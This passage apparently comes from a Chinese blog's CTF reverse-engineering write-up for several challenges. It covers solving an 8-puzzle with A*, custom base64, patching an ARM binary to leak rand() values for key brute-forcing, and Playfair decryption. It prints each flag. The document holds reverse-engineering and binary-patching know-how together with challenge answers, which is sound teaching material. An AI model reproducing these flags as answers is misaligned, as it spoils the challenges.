class="number">7</span>,<span class="number">8</span>,<span class="number">0</span>};</span><br><span class="line"> <span class="keyword">if</span>(!(calDe(start)%<span class="number">2</span> == calDe(target)%<span class="number">2</span>)){</span><br><span class="line"> cout << <span class="string">"无解\n"</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> int path[maxState] = {<span class="number">0</span>};</span><br><span class="line"> int res = Astar(a,start,target,path);</span><br><span class="line"> <span class="keyword">if</span>(res == <span class="number">-1</span>){</span><br><span class="line"> cout << <span class="string">"达到最大搜索能力\n"</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> int shortest[maxState] = {<span class="number">0</span>},j = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">while</span>(res != <span class="number">0</span>){</span><br><span class="line"> shortest[j++] = res;</span><br><span class="line"> res = path[res];</span><br><span class="line"> }</span><br><span class="line"> cout << <span class="string">"第 0 步\n"</span>;</span><br><span class="line"> show(a,<span class="number">0</span>);</span><br><span class="line"> <span class="keyword">for</span>(int i = j - <span class="number">1</span>;i >= <span class="number">0</span>;i --){</span><br><span class="line"> cout << <span class="string">"第 "</span> << j-i << <span class="string">" 步\n"</span>;</span><br><span class="line"> show(a,shortest[i]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>得到每一步的情况,进而根据switch写出路径。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">第 <span class="number">0</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">0</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">2</span> <span class="number">6</span></span><br><span class="line"><span class="number">8</span> <span class="number">1</span> <span class="number">5</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">1</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">0</span> <span class="number">6</span></span><br><span class="line"><span class="number">8</span> <span class="number">1</span> <span class="number">5</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">2</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">6</span></span><br><span class="line"><span class="number">8</span> <span class="number">0</span> <span class="number">5</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">3</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">6</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">0</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">4</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">0</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">5</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">0</span></span><br><span class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">3</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">6</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">0</span> <span class="number">2</span></span><br><span class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">3</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">7</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">7</span> <span class="number">0</span> <span class="number">3</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">8</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">7</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">8</span> <span class="number">0</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">9</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">7</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">0</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">10</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">0</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">11</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">0</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">4</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">12</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">1</span> <span class="number">0</span> <span class="number">2</span></span><br><span class="line"><span class="number">4</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">13</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">1</span> <span class="number">2</span> <span class="number">0</span></span><br><span class="line"><span class="number">4</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">14</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">1</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">4</span> <span class="number">5</span> <span class="number">0</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">15</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">1</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">4</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">0</span></span><br><span class="line">-------------------------------</span><br><span class="line"></span><br><span class="line"><span class="number">6</span> 左</span><br><span class="line"><span class="number">2</span> 上</span><br><span class="line"><span class="number">4</span> 右</span><br><span class="line"><span class="number">8</span> 下</span><br><span class="line">// <span class="number">884226886224488</span></span><br></pre></td></tr></table></figure></div><p>路径为“884226886224488”。</p><p>接下来看主函数里check上面的部分,看到sub_409070()实际上是一个scanf,而dword_4A1B60是我们的输入,也就是最后的flag,中间对输入进行处理以后才得到“884226886224488”这个字符串。</p><p>在里面翻可以翻到一个sub_400B58(),猜测是base64换表编码。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/L6cnUY18EAKhoxr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>于是尝试写脚本编码。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">b64table=<span class="string">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"</span></span><br><span class="line">mytable=<span class="string">""</span></span><br><span class="line">offset=<span class="number">-18</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(b64table)):</span><br><span class="line"> mytable+=b64table[(i+offset)%len(b64table)]</span><br><span class="line">text=<span class="string">"884226886224488"</span>.encode()</span><br><span class="line">cipher=base64.b64encode(text).decode().translate(str.maketrans(b64table,mytable))</span><br><span class="line">print(cipher)</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/wLeNVSOIGbaT3kp.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>试试能不能过check。</p><p>wsl运行:(要装qemu才能执行,毕竟特殊架构。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">cp $(which qemu-mips) .</span><br><span class="line">./qemu-mips -L . ./puzzle</span><br></pre></td></tr></table></figure></div><p>执行mips程序,输入脚本中解出的字符串,发现成功了,get flag。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/gEW5ToHm3iCdrwR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>flag{8xOi6R2k8xOk6R2i7xOm}</strong></p><h2 id="aRm"><a href="#aRm" class="headerlink" title="aRm"></a>aRm</h2><p>arm架构。</p><p>照例通过字符串回溯找到主函数。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/KciRx98Oktl574I.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/P6OLQ3l8tGuACgU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>v1是key,v9是输入的flag,对输入的限制就是长度为42且头尾是“flag{”和“}”。</p><p>动态调一下可以发现,sub_27770()这个函数实际上是把unk_723A0数组里的42个数据复制到v8里。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">./qemu-arm -L ./ -g 12345 ./aRm</span><br></pre></td></tr></table></figure></div><p>(Debugger选Remote GDB debugger,把端口号填上就好,其余配置具体见<a href="https://c10udlnk.top/2020/12/14/reSkillsOn-Debugging/" target="_blank" rel="noopener">RE套路 - 关于使用IDA 7.0前端进行的动态调试 | c10udlnk_Log</a>中调试elf部分。</p><p>现在我们未知的数就剩v5和v6了,v5要看sub_1714C()的输出,v6这里相当于是42条42元一次方程组(输入未知的情况下)。</p><p>而sub_105B4()是输出42个结果,于是可以知道只要输出了output.txt里的42个数就是正确的flag了。</p><p>由于前面有一个sub_169AC(key),这边又是一个无参的sub_1714C()+1,于是猜测是srand(seed)和rand()。</p><p>为了证明猜测,多次运行程序输入同一个key和相同/不同的flag,发现每一次的v5是一样的,结合rand()的伪随机性,确定这就是随机函数。</p><p>由于key只有一字节(0~255),干脆直接爆破。把output.txt的数据读入,用sympy库解方程,只要第一个解x0等于<code>ord('f')^v8[0]=102^0xA0=198</code>,就说明这个key有极大可能性是正确的key。</p><p>当然,在此之前,我们得先知道每一次的v5(即方程的系数)是多少。</p><p>于是hook函数,在v5生成之后复用程序原来就有的print函数及格式符,把每次生成的v5都打印出来。</p><p>还记得有个函数是可以输出八位十六进制数的吧,就是那个sub_105B4(),我们可以用这里面的printf,然后把调用这个函数的地方nop掉(目标要明确,现在是为了爆破key,没必要管程序的正常性hahah)。</p><blockquote><p>本来是想自己堆个调用printf出来的,不知道为什么keypatch对<code>LDR R0, =a08x</code>解释不了,于是只好绕个小路了。</p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/c6iquNsdGHzAemV.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>转到汇编窗口,记一下这里的loc,等会要跳过来的。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/PsZHxBAOQKvFUEj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>看回去原来二重循环里出v5那个地方</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/92lTItrMAqsSHxP.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这几条语句的意思就是f5里面的那行<code>v5 = (unsigned __int8)(sub_1714C() + 1);</code>,我们从再下一行开始改。</p><p>注意可以改的范围在蓝框这里,这是我们不需要的<code>v6[j] += (unsigned __int8)v9[k] * v5;</code>,在这个范围里可以尽情修改,剩下的nop掉。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/nsExR1OZfkurFJj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>用keypatch直接输入汇编,patch后面的语句为</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/h6HPswAX9mj8KBg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>(其实就是改了一行<code>B loc_105D4</code>,剩下的直接Fill with NOPs就好)</p><p>接下来去往loc_105D4,改造一下。</p><p>我们知道,现在R3寄存器里实际上存的是v5的值,我们调用printf直接输出R3的值就能达成目标。</p><p>在ARM汇编里,函数传参用R0、R1……所以我们这里给R1一个R3的值就好。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/MQeLXrOTJ2HqmaV.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这里本来就是<code>MOV R1, R3</code>不用改,所以直接把前面nop掉。</p><p>因为v5那里是取(unsigned __int8),所以把这里改一下,把”%08x”改成”%02x”,就是出来的v5。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/pXCytkh1iYEdzOR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>别忘了后面还要跳回去,找到地址:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/GKd2eHQiFbMrOAx.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>patch:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/YycGPMOC5fWIDJr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>记得把调用sub_105B4()的地方也nop掉。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/z5TpOXu7FfJkrda.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>最后把patch的字节保存一下。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/WNblUYCMOGkf6iF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>运行测试一下,有:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/z8jeYPCZv43pEbV.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>ok,hook成功,开始爆破。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pexpect</span><br><span class="line"><span class="keyword">from</span> sympy <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">data=[]</span><br><span class="line"><span class="keyword">with</span> open(<span class="string">'output.txt'</span>,<span class="string">'r'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> tmp=f.read().split(<span class="string">'\r\n'</span>)</span><br><span class="line"> data=[int(x,<span class="number">16</span>) <span class="keyword">for</span> x <span class="keyword">in</span> tmp]</span><br><span class="line">src=[<span class="number">0xA0</span>, <span class="number">0xE4</span>, <span class="number">0xBA</span>, <span class="number">0xFB</span>, <span class="number">0x10</span>, <span class="number">0xDD</span>, <span class="number">0xAC</span>, <span class="number">0x65</span>, <span class="number">0x8D</span>, <span class="number">0x0B</span>, <span class="number">0x57</span>, <span class="number">0x1A</span>, <span class="number">0xE4</span>, <span class="number">0x28</span>, <span class="number">0x96</span>, <span class="number">0xB3</span>, <span class="number">0x0C</span>, <span class="number">0x79</span>, <span class="number">0x4D</span>, <span class="number">0x80</span>, <span class="number">0x90</span>, <span class="number">0x99</span>, <span class="number">0x58</span>, <span class="number">0xFE</span>, <span class="number">0x50</span>, <span class="number">0xD3</span>, <span class="number">0xF9</span>, <span class="number">0x3C</span>, <span class="number">0x0F</span>, <span class="number">0xC1</span>, <span class="number">0xE3</span>, <span class="number">0xA6</span>, <span class="number">0x39</span>, <span class="number">0xC3</span>, <span class="number">0x28</span>, <span class="number">0x75</span>, <span class="number">0xF8</span>, <span class="number">0xC9</span>, <span class="number">0xC8</span>, <span class="number">0xCD</span>, <span class="number">0x78</span>, <span class="number">0x26</span>]</span><br><span class="line">flag=<span class="string">'flag{000000000000000000000000000000000000}'</span></span><br><span class="line"></span><br><span class="line">var=[]</span><br><span class="line"><span class="keyword">for</span> num <span class="keyword">in</span> range(<span class="number">42</span>):</span><br><span class="line"> exec(<span class="string">"x"</span>+str(num)+<span class="string">"=Symbol('x'+str(num))"</span>)</span><br><span class="line"> var.append(<span class="string">"x"</span>+str(num)) <span class="comment">#创建42个变量x0~x41</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">256</span>):</span><br><span class="line"> r=pexpect.spawn(<span class="string">'./qemu-arm -L ./ ./aRm_getRand'</span>)</span><br><span class="line"> r.sendline(str(i))</span><br><span class="line"> r.sendline(flag)</span><br><span class="line"> r.readline()</span><br><span class="line"> r.readline()</span><br><span class="line"> rand=[]</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">42</span>*<span class="number">42</span>):</span><br><span class="line"> s=r.readline()</span><br><span class="line"> rand.append(int(str(s)[<span class="number">2</span>:<span class="number">-5</span>],<span class="number">16</span>))</span><br><span class="line"> r.wait()</span><br><span class="line"> exper=[]</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">42</span>):</span><br><span class="line"> anEx=<span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">42</span>):</span><br><span class="line"> anEx+=str(rand[j*<span class="number">42</span>+k])+<span class="string">"*"</span>+var[k]+<span class="string">"+"</span></span><br><span class="line"> anEx=anEx[:<span class="number">-1</span>]+<span class="string">"-"</span>+str(data[j])</span><br><span class="line"> exper.append(anEx)</span><br><span class="line"> res=solve(exper,var)</span><br><span class="line"> print(str(i)+<span class="string">": "</span>)</span><br><span class="line"> print(res.values())</span><br></pre></td></tr></table></figure></div><p>爆破得到:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/QPZIM25mcpSU3Jv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>可知key是82,而v9在xor以后的数组也爆出来了,简单xor得flag:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">arr=[<span class="number">0xA0</span>, <span class="number">0xE4</span>, <span class="number">0xBA</span>, <span class="number">0xFB</span>, <span class="number">0x10</span>, <span class="number">0xDD</span>, <span class="number">0xAC</span>, <span class="number">0x65</span>, <span class="number">0x8D</span>, <span class="number">0x0B</span>, <span class="number">0x57</span>, <span class="number">0x1A</span>, <span class="number">0xE4</span>, <span class="number">0x28</span>, <span class="number">0x96</span>, <span class="number">0xB3</span>, <span class="number">0x0C</span>, <span class="number">0x79</span>, <span class="number">0x4D</span>, <span class="number">0x80</span>, <span class="number">0x90</span>, <span class="number">0x99</span>, <span class="number">0x58</span>, <span class="number">0xFE</span>, <span class="number">0x50</span>, <span class="number">0xD3</span>, <span class="number">0xF9</span>, <span class="number">0x3C</span>, <span class="number">0x0F</span>, <span class="number">0xC1</span>, <span class="number">0xE3</span>, <span class="number">0xA6</span>, <span class="number">0x39</span>, <span class="number">0xC3</span>, <span class="number">0x28</span>, <span class="number">0x75</span>, <span class="number">0xF8</span>, <span class="number">0xC9</span>, <span class="number">0xC8</span>, <span class="number">0xCD</span>, <span class="number">0x78</span>, <span class="number">0x26</span>]</span><br><span class="line">x=[<span class="number">198</span>, <span class="number">136</span>, <span class="number">219</span>, <span class="number">156</span>, <span class="number">107</span>, <span class="number">228</span>, <span class="number">152</span>, <span class="number">7</span>, <span class="number">239</span>, <span class="number">63</span>, <span class="number">97</span>, <span class="number">127</span>, <span class="number">134</span>, <span class="number">5</span>, <span class="number">247</span>, <span class="number">131</span>, <span class="number">109</span>, <span class="number">75</span>, <span class="number">96</span>, <span class="number">180</span>, <span class="number">241</span>, <span class="number">173</span>, <span class="number">57</span>, <span class="number">211</span>, <span class="number">49</span>, <span class="number">224</span>, <span class="number">157</span>, <span class="number">9</span>, <span class="number">34</span>, <span class="number">243</span>, <span class="number">129</span>, <span class="number">199</span>, <span class="number">1</span>, <span class="number">244</span>, <span class="number">31</span>, <span class="number">17</span>, <span class="number">157</span>, <span class="number">171</span>, <span class="number">252</span>, <span class="number">249</span>, <span class="number">64</span>, <span class="number">91</span>]</span><br><span class="line">flag=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">42</span>):</span><br><span class="line"> flag+=chr(x[i]^arr[i])</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/nfkJdxGXPvbhoqr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>flag{94bb46eb-a0a2-4a4a-a3d5-2ba877deb448}</strong></p><h2 id="pe"><a href="#pe" class="headerlink" title="pe"></a>pe</h2><p>arm架构,没环境调不动,只能硬看了XD。这题有好多奇怪的函数,而且通过伪代码跟的话就能看到函数套函数套函数……所以基本靠猜出来的(</p><p>继续通过字符串回溯找主函数。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/8tuVcrXQkSEIaWi.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/QesgnhHTZGCOjzY.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>根据参数猜测,sub_1400023C8()是strcmp()的作用,我们需要让v9=”KIMLXDWRZXTHXTHQTXTXHZWC”。</p><p>再往上走,sub_1400015B0这个函数调用了v9,于是跟进去看功能。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/Ttskz41Y6CJrUf2.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>感觉是某种加密,以相邻的两字符为一组,对这两个字符做相同的操作,再做后续处理。</p><p>跟进sub_1400012B8()里看,可以看到大概是一个搜索的过程</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/hRDOJ8wAFi52aVy.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>如果不等于-1就说明在表中找到了这个元素,然后返回一个索引(?</p><p>再往下看好像就看不太懂了,然后就是玄学的猜猜猜= =</p><p>回去看string可以看到一个这个,猜测是密钥表之类的?</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/zo7s4FcXJb3EIvP.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>往上回溯也看不到什么线索,不过可以发现这25个数字刚好没有相同的。</p><p>现在总结一下这个古典加密算法的特点,大概是两个为一组处理+已定义的密钥表(即不是通过输入生成的)5*5+处理时用到索引。</p><p>很久很久以前想写某对cp的AU同人时想把ctf元素混进去,就看了很多简单又奇奇怪怪的编码/古典密码(现代密码太学术了XD),没想到现在有用武之地了(手动狗头。</p><p>然后翻到了一个符合这个特点的密码,Playfair Cipher:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/NTcqU3pazyZ5GQb.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>不同的是密码表是直接给出的,不过加密流程再对回ida里的反编译感觉挺像的,于是果断试试。</p><p>按照Playfair Cipher的加解密流程写出脚本:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getIndex</span><span class="params">(c)</span>:</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(key)):</span><br><span class="line"> <span class="keyword">if</span> key[i].find(c)!=<span class="number">-1</span>:</span><br><span class="line"> <span class="keyword">return</span> i,key[i].find(c)</span><br><span class="line">letter_list=<span class="string">"ABCDEFGHJKLMNOPQRSTUVWXYZ"</span></span><br><span class="line">key=[<span class="string">"CREIH"</span>,<span class="string">"TQGNU"</span>,<span class="string">"AOVXL"</span>,<span class="string">"DZKYM"</span>,<span class="string">"PBWFS"</span>]</span><br><span class="line">cipher=<span class="string">"KIMLXDWRZXTHXTHQTXTXHZWC"</span></span><br><span class="line">text=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(cipher),<span class="number">2</span>):</span><br><span class="line"> j=i+<span class="number">1</span></span><br><span class="line"> x1,y1=getIndex(cipher[i])</span><br><span class="line"> x2,y2=getIndex(cipher[j])</span><br><span class="line"> <span class="keyword">if</span> x1==x2:</span><br><span class="line"> text+=key[x1][(y1+<span class="number">1</span>)%<span class="number">5</span>]+key[x2][(y2+<span class="number">1</span>)%<span class="number">5</span>]</span><br><span class="line"> <span class="keyword">elif</span> y1==y2:</span><br><span class="line"> text+=key[(x1+<span class="number">1</span>)%<span class="number">5</span>][y1]+key[(x2+<span class="number">1</span>)%<span class="number">5</span>][y2]</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> text+=key[x1][y2]+key[x2][y1]</span><br><span class="line"> i+=<span class="number">2</span></span><br><span class="line">print(text)</span><br></pre></td></tr></table></figure></div><p>走一遍脚本解密可以得到:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/WPy37pseOScbCUf.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>YES MAYBE YOU CAN RUN AN ARM PE</p><p>No, I can’t 😦</p><p>看起来能读的通,成功get flag。</p><p><strong>flag{YESMAYBEYOUCANRUNANARMPE}</strong></p>]]></content>
<summary type="html">
<p>华为三场比赛</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>网络安全复习</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/01/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%8D%E4%B9%A0/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/01/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%8D%E4%B9%A0/</id>
<published>2021-01-01T09:09:55.948Z</published>
<updated>2021-01-05T11:38:56.286Z</updated>
